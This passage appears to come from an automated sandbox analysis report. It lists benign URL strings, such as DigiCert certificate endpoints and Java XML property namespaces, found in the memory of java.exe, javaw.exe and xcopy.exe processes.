Source: xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: xcopy.exe, 00000012.00000003.1837161328.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1807146434.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/
Source: xcopy.exe, 00000012.00000003.1807146434.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/java.vendor.url.bughttp://bugreport.sun.com/bugreport/%d.%djava.class.version
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/dtd/properties.dtd
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/#=
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check3i
Source: java.exe, 00000004.00000002.2957859802.0000000015182000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807982473.000000001517B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkrce
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguagec
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource7
Source: java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSourceh
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespaceE
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespaceK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd/No
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateN(
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateSb
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-eventW
Source: xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/
Source: xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/vp6decoderflvdemuxvideo/x-flvaudiovideoUnsupportedvideo/unsupportedvideo/x-vp6-fla
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/3
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/;
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/h
Source: xcopy.exe, 00000012.00000003.1859565574.000000000229F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: xcopy.exe, 00000012.00000003.1851523869.000000000229F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://llvm.org
Source: javaw.exe, 00000001.00000002.2961037370.0000000014D53000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014D6D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009908000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015182000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807982473.000000001517B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com
Source: xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
